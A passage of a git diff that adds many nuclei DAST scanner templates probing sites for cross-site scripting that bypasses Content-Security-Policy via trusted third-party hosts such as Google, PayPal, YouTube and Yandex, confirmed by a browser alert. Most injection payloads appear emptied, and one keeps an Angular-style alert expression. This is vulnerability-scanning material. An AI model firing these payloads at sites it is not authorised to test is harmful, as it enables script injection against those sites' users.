+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_google_recaptcha_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_google_recaptcha_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-google-search-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-google-search-csp-xss.yaml
new file mode 100644
index 00000000000..5a5b7dd148b
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-google-search-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-google-search-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Search
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_google_search_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_google_search_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-googleapis-blogger-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-googleapis-blogger-csp-xss.yaml
new file mode 100644
index 00000000000..053304ed5fb
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-googleapis-blogger-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-googleapis-blogger-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google APIs Blogger
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,googleapis
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_googleapis_blogger_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_googleapis_blogger_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-googleapis-customsearch-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-googleapis-customsearch-csp-xss.yaml
new file mode 100644
index 00000000000..bb1145a3aa3
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-googleapis-customsearch-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-googleapis-customsearch-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google APIs Custom Search
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,googleapis
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_googleapis_customsearch_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_googleapis_customsearch_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-googletagmanager-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-googletagmanager-csp-xss.yaml
new file mode 100644
index 00000000000..87824d5cf1e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-googletagmanager-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-googletagmanager-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Tag Manager
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,googletagmanager
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_googletagmanager_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_googletagmanager_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-gstatic-angular-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-gstatic-angular-csp-xss.yaml
new file mode 100644
index 00000000000..f5ecae7026f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-gstatic-angular-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-gstatic-angular-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via GStatic Angular
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,gstatic
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_gstatic_angular_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_gstatic_angular_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-gstatic-recaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-gstatic-recaptcha-csp-xss.yaml
new file mode 100644
index 00000000000..fa3430b3823
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-gstatic-recaptcha-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-gstatic-recaptcha-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via GStatic ReCaptcha
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,gstatic
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_gstatic_recaptcha_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_gstatic_recaptcha_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-meteoprog-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-meteoprog-csp-xss.yaml
new file mode 100644
index 00000000000..65bdba26478
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-meteoprog-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-meteoprog-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Meteoprog
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,meteoprog
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_meteoprog_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_meteoprog_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-microsoft-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-microsoft-csp-xss.yaml
new file mode 100644
index 00000000000..1c3983f9470
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-microsoft-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-microsoft-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Microsoft API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,microsoft
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_microsoft_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_microsoft_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-paypal-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-paypal-csp-xss.yaml
new file mode 100644
index 00000000000..18d09a3730a
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-paypal-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-paypal-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via PayPal API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,paypal
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_paypal_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_paypal_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-recaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-recaptcha-csp-xss.yaml
new file mode 100644
index 00000000000..5413aeeaf52
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-recaptcha-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-recaptcha-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via ReCaptcha
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,recaptcha
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_recaptcha_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_recaptcha_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-reddit-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-reddit-csp-xss.yaml
new file mode 100644
index 00000000000..ec114e8d865
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-reddit-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-reddit-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Reddit API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,reddit
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_reddit_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_reddit_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-roblox-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-roblox-csp-xss.yaml
new file mode 100644
index 00000000000..aa997321c6c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-roblox-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-roblox-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Roblox API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,roblox
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_roblox_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_roblox_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-st-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-st-csp-xss.yaml
new file mode 100644
index 00000000000..802a283244f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-st-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-st-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via ST
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,st
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_st_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_st_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-yastat-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-yastat-csp-xss.yaml
new file mode 100644
index 00000000000..22618996e13
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-yastat-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-yastat-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yastat
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,yastat
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
foo
{{ [1].reduce(value.alert, 1); }}
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_yastat_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_yastat_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-yastatic-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-yastatic-csp-xss.yaml
new file mode 100644
index 00000000000..69cd3522fde
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-yastatic-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-yastatic-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yastatic
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,yastatic
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_yastatic_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_yastatic_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-youtube-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-youtube-csp-xss.yaml
new file mode 100644
index 00000000000..471a4bf0dcb
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-youtube-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-youtube-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via YouTube API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,youtube
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_youtube_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_youtube_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/x-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/x-api-csp-xss.yaml
new file mode 100644
index 00000000000..0579b7c5379
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/x-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: x-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via X API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,x
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: x_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "x_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/yahoo-ads-yap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/yahoo-ads-yap-csp-xss.yaml
new file mode 100644
index 00000000000..b1d89c2432b
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/yahoo-ads-yap-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: yahoo-ads-yap-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yahoo Ads Yap
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,yahoo
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: yahoo_ads_yap_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "yahoo_ads_yap_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/yandex-st-csp-xss.yaml b/dast/vulnerabilities/xss/csp/yandex-st-csp-xss.yaml
new file mode 100644
index 00000000000..a78fd01c02e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/yandex-st-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: yandex-st-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yandex ST
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,yandex
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: yandex_st_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "yandex_st_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml b/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml
new file mode 100644
index 00000000000..436526cd83f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: youtube-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via YouTube
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,youtube
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: youtube_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "youtube_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/yuedust-yuedu-csp-xss.yaml b/dast/vulnerabilities/xss/csp/yuedust-yuedu-csp-xss.yaml
new file mode 100644
index 00000000000..65067a2cc57
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/yuedust-yuedu-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: yuedust-yuedu-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yuedust Yuedu
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,yuedust
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: yuedust_yuedu_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "yuedust_yuedu_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/yugiohmonstrosdeduelo-blogspot-csp-xss.yaml b/dast/vulnerabilities/xss/csp/yugiohmonstrosdeduelo-blogspot-csp-xss.yaml
new file mode 100644
index 00000000000..e953ae350af
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/yugiohmonstrosdeduelo-blogspot-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: yugiohmonstrosdeduelo-blogspot-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yugioh Blogspot
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,blogspot
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
